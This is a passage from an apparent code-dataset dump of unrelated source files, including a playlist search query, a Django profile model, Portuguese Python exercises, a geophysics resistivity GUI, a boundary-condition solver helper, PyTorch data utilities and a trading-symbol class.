get_unpopulated_playlists(session, playlist_ids, True)\n\n # TODO: Populate playlist metadata should be sped up to be able to be\n # used in search autocomplete as that'll give us better results.\n if is_auto_complete:\n # fetch users for playlists\n playlist_owner_ids = list(\n map(lambda playlist: playlist[\"playlist_owner_id\"], playlists)\n )\n users = get_unpopulated_users(session, playlist_owner_ids)\n users_dict = {user[\"user_id\"]: user for user in users}\n\n # attach user objects to playlist objects\n for i, playlist in enumerate(playlists):\n user = users_dict[playlist[\"playlist_owner_id\"]]\n # Add user balance\n balance = playlist_data[i][1]\n associated_balance = playlist_data[i][2]\n user[response_name_constants.balance] = balance\n user[\n response_name_constants.associated_wallets_balance\n ] = associated_balance\n playlist[\"user\"] = user\n\n else:\n # bundle peripheral info into playlist results\n playlists = populate_playlist_metadata(\n session,\n playlist_ids,\n playlists,\n [repost_type],\n [save_type],\n 
current_user_id,\n )\n\n # Preserve order from playlist_ids above\n playlists_map = {}\n for p in playlists:\n playlists_map[p[\"playlist_id\"]] = p\n playlists = [playlists_map[playlist_id] for playlist_id in playlist_ids]\n\n return playlists[0:limit]\n","sub_path":"discovery-provider/src/queries/search_queries.py","file_name":"search_queries.py","file_ext":"py","file_size_in_byte":28653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"547256891","text":"import io\nfrom django.core.files.storage import default_storage as storage\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom PIL import Image, ImageDraw\n\n\nclass Profile(models.Model):\n \"\"\"Extending the user profile by adding additional information.\n On delete argument CASCADE > when the user is deleted, his profile is deleted also,\n but if profile is deleted, user is not.\"\"\"\n\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n # Additional information required for registration\n homeAddress = models.CharField(\n blank=True, max_length=200, default=\"Your home address\"\n )\n profileImage = models.ImageField(default=\"default.jpg\", upload_to=\"profile_images\")\n membershipCard = models.ImageField(default=\"\", upload_to=\"membership_cards\")\n\n def __str__(self):\n return f\"{self.user.username} Profile\"\n\n \"\"\"Override save function in order to resize the image,\n so that the file system will not get loaded with big files,\n affecting performance. \n The resized image is now saved also on S3 Amazon\"\"\"\n\n def save(self, *args, **kwargs):\n super().save(*args, **kwargs)\n\n imgProfile_read = storage.open(self.profileImage.name, \"r\")\n imgProfile = Image.open(imgProfile_read)\n if imgProfile.height > 300 or imgProfile.width > 300:\n outputSize = (75, 75)\n imgProfile.thumbnail(outputSize)\n in_mem_file = io.BytesIO()\n imgProfile.save(in_mem_file, format=\"JPEG\")\n img_write = storage.open(self.profileImage.name, \"w+\")\n img_write.write(in_mem_file.getvalue())\n img_write.close()\n\n imgProfile_read.close()\n\n","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"422281545","text":"resposta = 'S'\r\ncont = media = soma = maior = menor = 0\r\nwhile resposta in 'Ss':\r\n n = int(input(\"Digite um número: \"))\r\n soma += n\r\n cont += 1\r\n if cont == 1:\r\n maior = menor = n\r\n else:\r\n if n > maior:\r\n maior = n\r\n if n < menor:\r\n menor = n\r\n resposta = str(input(\"Deseja continuar:[S / N] \")).upper().strip()[0]\r\nmedia = soma / cont\r\nprint(f'Você digitou {cont} valores')\r\nprint(\"Maior valor foi {}\".format(maior))\r\nprint(\"Menor valor foi {}\".format(menor))\r\nprint(\"Media dos valores digitados foi {}\".format(media))","sub_path":"PythonBasicoMundo02/Desafio65.py","file_name":"Desafio65.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125824388","text":"from model_bakery import baker\nfrom django.test import TestCase\n\nfrom companies.models import Company\n\nfrom ..models import Sponsor\nfrom ..templatetags.sponsors import featured_sponsor_rotation, full_sponsorship\n\n\nclass SponsorTemplatetagTests(TestCase):\n def test_templatetag(self):\n sponsors_context = featured_sponsor_rotation()\n self.assertEqual({}, sponsors_context)\n\n\nclass 
FullSponsorshipTemplatetagTests(TestCase):\n def test_templatetag_context(self):\n sponsorship = baker.make(\"sponsors.Sponsorship\", _fill_optional=True)\n context = full_sponsorship(sponsorship)\n expected = {\n \"sponsorship\": sponsorship,\n \"sponsor\": sponsorship.sponsor,\n \"benefits\": list(sponsorship.benefits.all()),\n }\n self.assertEqual(context, expected)\n","sub_path":"sponsors/tests/test_templatetags.py","file_name":"test_templatetags.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"93400039","text":"'''\nGeo-Resistivity-meter\n\nHardware and software repository for a geophysical instrument\n\n**Descrição da função e objetivo do código \"Geo-Resistivity-Meter\":** \n\nThe provided code is a Python program using the Tkinter library to create a graphical user interface (GUI) for a geophysical measurement instrument called \"Geo-Resistivity-Meter.\" This interface consists of multiple tabs, each representing different functionalities and steps related to measuring apparent resistivity of the soil or subsurface in geophysical applications.\n\n**Code Operation:**\n\n1. The GUI is created using Tkinter and divided into several tabs: \"Home Page,\" \"Spreadsheet,\" \"Apparent Resistivity,\" \"Fitting an error model,\" and \"Inversion.\" Each tab represents a specific functionality of the geophysical instrument.\n\n2. The \"Home Page\" tab displays information about the Geo-Resistivity-Meter instrument, provides links for help, accessing the project's software repository and information, and allows the user to select a path and folder name to store the resistivity measurement data.\n\nThe algorithm uses R2 (http://www.es.lancs.ac.uk/people/amb/Freeware/R2/R2.htm), which is a forward/inverse solution for 3D or 2D current flow in a quadrilateral or triangular mesh. The inverse solution is based on a regularized objective function combined with weighted least squares (an 'Occams' type solution) as defined in Binley and Kemna (2005) and Binley (2015). Electrodes can be placed on the ground surface or in boreholes. Topography is easily accounted for in the finite element mesh. A 32-bit and 64-bit version for Intel compatible processors are provided in the download. Executables for other platforms are available from the author. The current (64-bit) version has no problem size limits.\n\n3. When the START button is clicked, the algorithm creates an object of the Project class, named \"k.\" This is the main object we will interact with. The second step is to read data from a survey file. Here, we choose a CSV file that contains only resistivity data. Importantly, when importing survey data, the object automatically searches for reciprocal measurements and calculates a reciprocal error with the found measurements.\n\n4. The \"Spreadsheet\" tab is related to the processing and display of resistivity measurement data.\n\n5. In the \"Apparent Resistivity\" tab, the program reads data from the previously created spreadsheet file and displays it on a pseudo-section graph generated using the Matplotlib library and displayed in the interface.\n\n6. 
In the \"Fitting an error model\" tab, another graph is created, representing the fitting of an error model to the measurement data.\n\nDifferent error models are available to be fitted to DC (direct current) data:\n\n- A simple linear model: k.fitErrorLin()\n- A power-law model: k.fitErrorPwl()\n- A linear mixed-effect model: k.fitErrorLME() (only on Linux with an R kernel installed)\n\nEach of these models will create a new error column in the Survey object, which will be used in the inversion if k.err = True.\n\n7. In the \"Inversion\" tab, the data is processed, and a graph is generated, showing the results of the resistivity data inversion.\n\n**Results Visualization and Post-processing:**\n\nResults can be shown using k.showResults(). Multiple arguments can be passed to the method to rescale the color bar, view the sensitivity or not, change the attribute, or plot contours. The inversion errors can also be plotted using k.pseudoError() or k.showInvError().\n\nThe inversion takes place in the working directory specified by the R2 object when k = R2 is first called. It can be changed later using k.setwd(). The inversion parameters are defined in a dictionary in k.param and can be manually changed by the user (e.g., k.param['a_wgt'] = 0.01). All parameters have default values, and their names follow the R2 manual. The .in file is written automatically when the k.invert() method is called.\n\n**Observations:**\n\n1. Some parts of the code are missing or incomplete, such as the definition of the \"selectPath()\" function and other functions, as well as the import of the \"salve\" and \"calculadora\" modules.\n\n2. Some lines of code are commented, indicating that these parts may be under development or adapted from other modules.\n\n3. The GUI allows user interaction to configure measurements and display results.\n\n4. The code is under development and may not be fully functional or optimized.\n\n5. 
For the code to work correctly, the imported modules must be available in the execution environment, and any other dependencies must be installed.\n'''\n\n# Import the required modules\nfrom tkinter import *\nfrom PIL import Image, ImageTk\nfrom tkinter import ttk\nimport time\nimport customtkinter\nimport sys\nimport re\nfrom tkinter import filedialog\nfrom tkinter.ttk import *\nfrom tkinter import *\nfrom PIL import Image, ImageTk\nimport time\nimport numpy as np\nimport pandas as pd\nfrom pandastable import Table\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, NavigationToolbar2Tk)\nfrom time import strftime\nimport os\nfrom io import StringIO\nfrom datetime import datetime\n\n# Import the askdirectory function from filedialog\nfrom tkinter.filedialog import askdirectory\nimport tkinter.messagebox\n\n# Import the showinfo function from messagebox\nfrom tkinter.messagebox import showinfo\n\n# Import the webbrowser module\nimport webbrowser\n\n# Import the platform module\nimport platform\n\n\n\n\n\ndef run():\n root = Tk()\n root.title('Geo-Resistivity-Meter')\n width_of_window = 1005\n height_of_window = 600\n screen_width = root.winfo_screenwidth()\n screen_height = root.winfo_screenheight()\n x_coordinate = (screen_width/2)-(width_of_window/2)\n y_coordinate = (screen_height/2)-(height_of_window/2)\n root.geometry(\"%dx%d+%d+%d\" %(width_of_window,height_of_window,x_coordinate,y_coordinate))\n root.configure(bg='white')\n\n icon = PhotoImage(file=\"figure/energia3.png\")#logo\n root.iconphoto(True, icon)\n \n my_font=('arial', 20, 'bold')\n my_font1=('fantasy', 26, 'bold')\n my_font2=('arial', 12, 'bold')\n root.resizable(False,False)\n \n estado_botao = False\n # ==============================================================================\n # ================== ABAS ===================================================\n # ==============================================================================\n s = ttk.Style()\n s.theme_create('pastel', settings={\n \".\": {\n \"configure\": {\n \"background\": '#ffffcc', # All except tabs\n \"font\": 'red'\n }\n },\n \"TNotebook\": {\n \"configure\": {\n \"background\":'#0b8be0', # Your margin color\n \"tabmargins\": [2, 5, 0, 0], # margins: left, top, right, separator\n }\n },\n \"TNotebook.Tab\": {\n \"configure\": {\n \"background\": '#d9ffcc', # tab color when not selected\n \"padding\": [10, 2], # [space between text and horizontal tab-button border, space between text and vertical tab_button border]\n \"font\":\"white\"\n },\n \"map\": {\n \"background\": [(\"selected\", '#ccffff')], # Tab color when selected\n \"expand\": [(\"selected\", [1, 1, 1, 0])] # text margins\n }\n }\n })\n s.theme_use('pastel')\n s.configure('TNotebook.Tab', font=my_font2 , highlightbackground=\"#dce6f4\")#fonte da abas\n tabsystem = ttk.Notebook(root)\n\n # Create new tabs using Frame widget\n tab1 = Frame(tabsystem,width=995,height=800,bg='#f0f0f0')\n tabsystem.add(tab1, text=' Home Page ')\n tabsystem.place(x=5,y=12)\n \n tab2 = Frame(tabsystem,width=995,height=800,bg='#f0f0f0')\n tabsystem.add(tab2, text=' Spreadsheet ')\n tabsystem.place(x=5,y=12)\n \n tab3 = Frame(tabsystem,width=995,height=800,bg='#f0f0f0')\n tabsystem.add(tab3, text=' Apparent Resistivity ')\n tabsystem.place(x=5,y=12)\n \n tab4 = Frame(tabsystem,width=995,height=800,bg='#f0f0f0')\n tabsystem.add(tab4, text=' Fitting an error model ')\n tabsystem.place(x=5,y=12)\n 
\n tab5 = Frame(tabsystem,width=995,height=800,bg='#f0f0f0')\n tabsystem.add(tab5, text=' Inversion ')\n tabsystem.place(x=5,y=12)\n \n \n def cria_pasta():\n\n path = StringVar() # Receiving user's file_path selection\n folder = StringVar() # Receiving user's folder_name selection\n\n Label(tab1,text = \"Target path:\").place(x=50, y= 250)\n Entry(tab1, textvariable = path).place(x=110, y= 250)\n Button(tab1, text = \"Path select: \", command = selectPath).place(x=265, y= 250)\n\n\n Label(tab1,text = \"Folder name:\").place(x=50, y= 300)\n Entry(tab1,textvariable = folder).place(x=110, y= 300)\n Button(tab1, text = \"Submit: \", command = create_file).place(x=265, y= 300)\n \n\n logo_image1 = ImageTk.PhotoImage(Image.open(\"figure/energia3.png\"))\n Label(tab1, image=logo_image1).place(x=5, y=5)\n Label(tab1,text = \"Geo-Resistivity-Meter\",font=my_font1).place(x=90, y= 10)\n\n Frame(tab1, width=350, height=150, background=\"#dce6f4\", highlightbackground=\"black\", highlightthickness=3).place(x=5, y=80)\n Frame(tab1, width=350, height=280, background=\"#dce6f4\", highlightbackground=\"black\", highlightthickness=3).place(x=5, y=250)\n Frame(tab1, width=616, height=450, background=\"#dce6f4\", highlightbackground=\"black\", highlightthickness=3).place(x=375, y=80)\n Frame(tab1, width=590, height=140, background=\"white\", highlightbackground=\"black\", highlightthickness=2).place(x=390, y=380)\n\n Label(tab1,text = \"Help\",font=my_font,bg='#0b8be0',fg=\"white\").place(x=8, y=83)\n Label(tab1,text = \"About\",font=my_font,bg='#0b8be0',fg=\"white\").place(x=8, y=253)\n Label(tab1,text = \"Start\",font=my_font,bg='#0b8be0',fg=\"white\").place(x=378, y=83)\n \n def click1():\n webbrowser.open_new(r\"https://github.com/LDSM-ON/Geo-Resistivity-meter\")\n def click2():\n webbrowser.open_new(r\"https://www.gov.br/observatorio/pt-br\")\n \n logo_git = ImageTk.PhotoImage(Image.open(\"figure/git.png\"))\n Label(tab1, image=logo_git).place(x=20, y=130)\n logo_caution = ImageTk.PhotoImage(Image.open(\"figure/caution.png\"))\n \n \n Label(tab1,text = \"Geo-Resistivity-Meter \\n Hardware and software repository \\n for a geophysical instrument \\n Made at the\",bg= \"#dce6f4\",font=('helvetica', 11)).place(x=65, y=291)\n \n Button(tab1,text = \"Help Home\",bd=0,bg= \"#dce6f4\",command=click1,foreground='blue',font=('helvetica', 11, 'underline')).place(x=40, y=125)\n Button(tab1,text = \"Report Problems\",bd=0,bg= \"#dce6f4\",command=click1,foreground='blue',font=('helvetica', 11, 'underline')).place(x=40, y=150)\n\n Button(tab1,text = \"Observatório Nacional\",bd=0,bg= \"#dce6f4\",command=click2,foreground='blue',font=('helvetica', 11, 'underline italic')).place(x=100, y=359)\n Label(tab1,text = \"with help from the open-source community \\n Raspberry Pi and Arduino \\n it is free software and you are welcome \\n to distribute it under certain conditions see.\",bg= \"#dce6f4\",font=('helvetica', 11)).place(x=30, y=381)\n \n Label(tab1, text = \"Software version: 1.0 \\n Python version: %s \\n \" % platform.python_version() + \"tkinter version: %d\" % tkinter.TkVersion,bg= \"#dce6f4\",font=('helvetica', 11)).place(x=100, y=450)\n\n labelframe = LabelFrame(tab1, text=\"Project Name\",bg='#dce6f4',font=my_font2)\n labelframe.place(x=390, y=130)\n\n labelframe2 = LabelFrame(tab1, text=\"Settings\",bg='#dce6f4',font=my_font2)\n labelframe2.place(x=390, y=225)\n\n labelframe3 = LabelFrame(tab1, text=\"Monitoring\",bg='#dce6f4',font=my_font2)\n labelframe3.place(x=390, y=295)\n\n labelframe4 = 
LabelFrame(tab1, text=\"Loop\",bg='#dce6f4',font=my_font2)\n labelframe4.place(x=390, y=286)\n\n \n def selectPath(): \n path_ = askdirectory()\n path.set(path_)\n \n def create_file():\n dirs = os.path.join(path.get(), folder.get())\n if not os.path.exists(dirs):\n os.makedirs(dirs)\n tkinter.messagebox.showinfo('Tips:','Pasta criado com sucesso!')\n \n path = StringVar() # Receiving user's file_path selection\n folder = StringVar() # Receiving user's folder_name selection\n numberChosen2 = IntVar() # Numero de eletrodos\n AB = StringVar()\n na = StringVar()\n \n Name_label = Label(labelframe,text = \"Name:\",bg='#dce6f4',font=my_font2).grid(row=0,column=0)\n Name_entry = Entry(labelframe,width=68,bd=2, textvariable=folder).grid(row=0,column=1,padx=10,pady=4)\n Path_label = Label(labelframe,text = \"Path:\",bg='#dce6f4',font=my_font2).grid(row=1,column=0)\n Path_entry = Entry(labelframe,width=68,bd=2, textvariable = path).grid(row=1,column=1,padx=10,pady=4)\n Button(labelframe, text = \"Browse \", command = selectPath, width=8, height=1,font=my_font2).grid(row=1,column=2,padx=3,pady=4)\n \n Label(labelframe2,text='Arranjo',bg='#dce6f4',height=0,font=my_font2).grid(row=0,column=8,padx=3,pady=4)\n \n arranjo = ttk.Combobox(labelframe2 ,state=\"readonly\",width=12,height=40,font=('helvetica', 16, 'bold'))\n arranjo['values'] = [\"Dipolo-Dipolo\", \"Wernner\", \"Schlumberger\", \"Pólo-Dipolo\"]\n arranjo['state'] = 'readonly'\n arranjo.set(\"\")\n arranjo.grid(row=0,column=9,padx=3,pady=4)\n \n # bind the selected value changes\n def arranjo_changed():\n if arranjo.get() == \"Schlumberger\":\n print(\"Schlumberger\")\n \n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Dipolo-Dipolo >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> \n if arranjo.get() == \"Dipolo-Dipolo\":\n \n sys.path.append((os.path.relpath('../src'))) # add here the relative path of the API folder\n testdir = \"../src/examples/dc-2d/\"\n from resipy import Project\n k = Project(typ='R2') # create a Project object in a working directory (can also set using k.setwd())\n k.createSurvey(testdir + 'root_file.csv', ftype='Syscal') # read the survey file\n \n \n # Function to redirect standard output to a text widget in Tkinter\n class StdoutRedirector:\n def __init__(self, text_widget):\n self.text_widget = text_widget\n self.output = StringIO()\n\n def write(self, text):\n self.output.write(text)\n self.text_widget.insert(END, text)\n self.text_widget.see(END)\n\n # Create Tkinter main window\n \n # Create a text widget to display the output\n output_text = Text(tab1, width=62, height=8)\n output_text.place(x=392, y=381)\n \n \n\n sys.stdout = StdoutRedirector(output_text)\n\n \n now = datetime.now()\n date_time = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n \n \n \n print(\"<<<<<<<<<<<<<<<<<<<< START OF SURVEY >>>>>>>>>>>>>>>>\")\n print(\"\")\n print(\"<<<<<<<<<<<<<<<<<<<< \"+date_time+\" >>>>>>>>>>>>>>>>>\")\n\n # Function to display the output\n \n \n k.filterUnpaired()\n k.fitErrorLin() \n k.createMesh(typ='quad') # generate quadrilateral mesh (default for 2D survey)\n k.showMesh() \n k.param['data_type'] = 1 # using log of resistitivy\n k.err = True # if we want to use the error from the error models fitted before\n k.invert() # this will do the inversion\n \n \n def 
create_folder_and_save(df, path, folder_name):\n \n global file_path\n # Get the current date and time\n current_time_date = datetime.now().strftime(\"%d%m%Y_%H%M%S\")\n \n folder_path = os.path.join(path, folder_name + \"_\" + current_time_date)\n os.makedirs(folder_path, exist_ok=True)\n\n # Save the file inside the folder\n file_path = os.path.join(folder_path, folder_name + \"_\" + current_time_date + \".csv\")\n df.to_csv(file_path, index=False)\n return file_path\n\n # ...\n\n # Here should be the path of the root file that contains the measurement data\n \n df = pd.read_csv('root_file.csv')\n \n create_folder_and_save(df, path.get(), folder.get())\n \n\n \n # delete space at end and beginning of column names\n headers = df.columns#create a worksheet headers list\n if 'Spa.1' in headers:\n newheaders = list(map(str.strip, headers)) \n dico = dict(zip(headers, newheaders))\n df = df.rename(index=str, columns=dico)\n df = df.rename(columns={'Spa.1':'a',\n 'Spa.2':'b',\n 'Spa.3':'m',\n 'Spa.4':'n',\n 'Rho_a':'Rho_a',\n 'In':'I(mA)',\n 'Vp':'vp',\n 'Dev.':'dev',\n 'M':'ip',\n 'Sp':'sp'})\n \n frame = Frame(tab2)\n frame.pack()\n \n pt = Table(frame, dataframe=df) \n table = pt = Table(frame, dataframe=df,showtoolbar=True, showstatusbar=True,width=890, height=480)\n pt.show()\n \n # Create a figure and axis for the chart\n fig, ax = plt.subplots(figsize=(14, 8))\n\n # Run k.showPseudo() and plot the graph\n k.showPseudo(ax=ax)\n\n # Create the canvas widget to display the picture\n canvas = FigureCanvasTkAgg(fig, master=tab3)\n canvas.draw()\n canvas.get_tk_widget().pack()\n \n #=====================================\n # Create a figure and axis for the chart\n fig, ax = plt.subplots(figsize=(14, 8))\n\n # Run k.showPseudo() and plot the graph\n k.fitErrorLin(ax=ax)\n\n # Create the canvas widget to display the picture\n canvas = FigureCanvasTkAgg(fig, master=tab4)\n canvas.draw()\n canvas.get_tk_widget().pack()\n \n \n #=====================================\n # Get the current date and time\n current_time_date = datetime.now().strftime(\"%d%m%Y_%H%M%S\")\n \n # Create a figure and axis for the chart\n fig, ax = plt.subplots(figsize=(14, 8))\n\n # Run k.showPseudo() and plot the graph\n \n k.showResults(attr='Resistivity(ohm.m)', sens=False, contour=True, vmin=30, vmax=100,ax=ax)\n \n # Create the canvas widget to display the picture\n canvas = FigureCanvasTkAgg(fig, master=tab5)\n canvas.draw()\n canvas.get_tk_widget().pack()\n\n # Full path to image file\n caminho_imagem = os.path.join(file_path, file_path + \"_\" + current_time_date + \".jpg\") # Replace with the desired file name\n\n # Save the canvas as a PNG image in the destination folder\n fig.savefig(caminho_imagem)\n print(\"\")\n print(path.get()+\"/\"+folder.get())\n \n \n \n print(\"<<<<<<<<<<<<<<<<<<<< \"+date_time+\" >>>>>>>>>>>>>>>>>\")\n print(\"\")\n print(\"<<<<<<<<<<<<<<<<<<<<<<< END OF SURVEY >>>>>>>>>>>>>>>>>>>\")\n \n \n \n \n numberChosen2 = ttk.Combobox(labelframe2, values=[\"24\",\"48\",\"72\"],state=\"readonly\",width=3,height=40,font=('helvetica', 14, 'bold'))\n numberChosen2.grid(row=0,column=1)\n numberChosen2.set(\"24\")\n \n numberChosen3 = ttk.Combobox(labelframe4, values=[\"no loop\",\"15 segundos\", \"30 segundos\", \"1 horas\", \"24 horas\"],state=\"readonly\", width=19,height=50,font=('helvetica', 16, 'bold'))\n numberChosen3.set(\"no loop\")\n numberChosen3.grid(row=0,column=0,padx=4,pady=4)\n\n N_elec_label = Label(labelframe2,text='N_elec: 
',bg='#dce6f4',height=0,font=my_font2).grid(row=0,column=0,padx=3,pady=4)\n \n A_label = Label(labelframe2,text='AB: ',bg='#dce6f4',height=0,font=my_font2).grid(row=0,column=2,padx=3,pady=4)\n A_entry = Entry(labelframe2,bd=2,width=3,font=my_font2,textvariable = AB,bg='yellow').grid(row=0,column=3,padx=3,pady=4)\n \n na_label = Label(labelframe2,text='na: ',bg='#dce6f4',height=0,font=my_font2).grid(row=0,column=6,padx=3,pady=4)\n na_entry = Entry(labelframe2,bd=2,width=3,font=my_font2,textvariable = na,bg='yellow').grid(row=0,column=7,padx=3,pady=4)\n \n def rep():\n if numberChosen3.get() == \"no loop\":\n arranjo_changed()\n if numberChosen3.get() == \"15 segundos\":\n for i in range(3):\n arranjo_changed()\n time.sleep(15)\n \n \n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n \n Button(labelframe4, text = \"TO UPDATE\", width=13, height=3).grid(row=0,column=1,padx=5,pady=4)\n Button(labelframe4, text = \"XXXXXX \", width=13, height=3).grid(row=0,column=2,padx=5,pady=4)\n Button(labelframe4, text = \"START\", command =rep,width=13, height=3).grid(row=0,column=3,padx=5,pady=4)\n \n\n\n \n root.mainloop()\n\n\n","sub_path":"jupyter-notebook/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"526462460","text":"import numpy as np\nimport warnings\nfrom math import fabs\n\nclass BCHandler():\n def __init__(self, BCType, BC0, BC1):\n self. BCType = BCType\n self.BC0 = BC0\n self.BC1 = BC1\n\n def impose_BC_on_side(self, A, rhs, idBoundary):\n n = np.shape(A)[0]\n if idBoundary == 0:\n idx = 0\n BCValue = self.BC0\n elif idBoundary == 1:\n idx = n-1\n BCValue = self.BC1\n else:\n warnings.warn('wrong idBoundary', idBoundary)\n exit(1)\n\n if self.BCType[idBoundary] == 'D':\n for j in range(n):\n if fabs(A[j, idx]) > 1.e-10:\n rhs[j] -= A[j, idx] * BCValue\n A[:, idx] = np.zeros(n)\n A[idx, :] = np.zeros(n)\n A[idx, idx] = 1.\n rhs[idx] = BCValue\n elif self.BCType[idBoundary] == 'N':\n rhs[idx] += BCValue\n elif self.BCType[idBoundary] == 'R':\n assert len(BCValue) == 2, 'not enough parameters; should be len 2 array'\n A[idx, idx] += BCValue[0]\n rhs[idx] += BCValue[0] * BCValue[1]\n else:\n warnings.warn('Unsupperted BC')\n exit(1)\n\n def impose_BC(self, A, rhs):\n self.impose_BC_on_side(A, rhs, 0)\n self.impose_BC_on_side(A, rhs, 1)\n\n\n\n\n\n","sub_path":"src/BC/BCHandler.py","file_name":"BCHandler.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"567464540","text":"from random import shuffle\nfrom typing import Tuple, Union\n\nfrom torch import nn\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision.datasets.mnist import MNIST\nfrom torchvision.transforms.transforms import Compose, Normalize, ToTensor\n\n\ndef get_mnist_dl(bs_train, bs_test, shuffle) -> Tuple[DataLoader, DataLoader]:\n transform = Compose(\n [\n ToTensor(),\n Normalize((0,), (1,)),\n ]\n )\n\n train_loader = DataLoader(\n MNIST(\n \".tmp\",\n train=True,\n download=True,\n transform=transform,\n ),\n batch_size=bs_train,\n shuffle=shuffle,\n )\n\n test_loader = DataLoader(\n MNIST(\n \".tmp\",\n train=False,\n download=True,\n transform=transform,\n ),\n batch_size=bs_test,\n shuffle=shuffle,\n )\n\n return train_loader, test_loader\n\n\nclass MapDataset(Dataset):\n def __init__(self, transform, data: 
Union[Dataset, DataLoader]) -> None:\n super().__init__()\n self.transform = transform\n self.data = data\n self.it = None\n\n def __len__(self):\n return len(self.data)\n\n def __iter__(self):\n return (self.transform(b, i) for i, b in enumerate(self.data))\n\n\nclass CachedDataset:\n def __init__(self, data: Union[Dataset, DataLoader], shuffle=False) -> None:\n \"\"\"Used to generate cached version of a datamodule. Yield once\n and then yields from the cache. Kind of designed to be used in\n a single thread. Consider the chainging state in the iterator.\n\n Args:\n data (Union[Dataset, DataLoader]): Dataloader/set to get the data from\n shuffle (bool, optional): Shuffle the cache buffer on every iteration.\n Defaults to False.\n \"\"\"\n self.buffer = []\n self.data = data\n self.shuffle = shuffle\n\n def __len__(self):\n return len(self.data)\n\n def __iter__(self):\n if len(self.buffer) > 0:\n if self.shuffle:\n shuffle(self.buffer)\n for b in self.buffer:\n yield b\n else:\n for b in self.data:\n self.buffer.append(b)\n yield b\n\n\nclass ParamCompose(nn.Module):\n \"\"\"Compose multiple modules that can yield be forwarded to yield the\n parameters of random transformation. This is needed because we might\n want to do this transformation multiple times.\n\n Used to forward parameters of random transformations\n of `kornia` augmentation modules.\n \"\"\"\n\n def __init__(self, functions):\n super().__init__()\n self.functions = nn.ModuleList(functions)\n\n def forward(self, inp, params=None):\n if params is None:\n params = [None] * len(self.functions)\n\n for f, p in zip(self.functions, params):\n inp = f(inp, p)\n\n return inp\n\n def forward_parameters(self, shape, device=\"cpu\"):\n params = []\n for f in self.functions:\n p = f.forward_parameters(shape)\n pp = {}\n for k, v in p.items():\n pp[k] = v.to(device)\n params.append(pp)\n\n return params\n","sub_path":"ez_torch/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"289822187","text":"num = num_par = ()\nnum_prt = (\"um\", \"outro\", \"mais um\", \"o último\")\nlista_num = list(num)\nlista_num_par = list(num_par)\nfor i in range(0, len(num_prt)):\n n = int(input(f\"Digite {num_prt[i]} número: \"))\n lista_num.append(n)\n if n % 2 == 0:\n lista_num_par.append(n)\nnum = tuple(lista_num)\nnum_par = tuple(lista_num_par)\nprint(f\"Você digitou os valores {num}\")\nprint(f\"O Valor 9 apareceu {num.count(9)} vezes\")\nif 3 in num:\n print(f\"O valor 3 apareceu na {num.index(3) + 1}ª posição\")\nelse:\n print(\"O valor 3 não foi digitado em nenhuma posição\")\nprint(\"Os valores pares digitados foram \", end=\"\")\nfor i in range(0, len(num_par)):\n print(num_par[i], end=\" \")","sub_path":"desafios/aula16/exe04.py","file_name":"exe04.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"427816396","text":"from src.models.base_symbol import BaseSymbol\n\n\ndef object_decoder(obj):\n return Ticker24hr(obj)\n\n\nclass Symbol:\n def __init__(self, symbol, price_change, price_change_percent, weighted_avg_price, prev_close_price, last_price,\n last_qty, bid_price, ask_price, open_price, high_price, low_price, volume, quote_volume, open_time,\n close_time, first_trade_id, last_trade_id, trade_count):\n self.symbol = symbol\n self.price_change = price_change\n self.price_change_percent = price_change_percent\n 
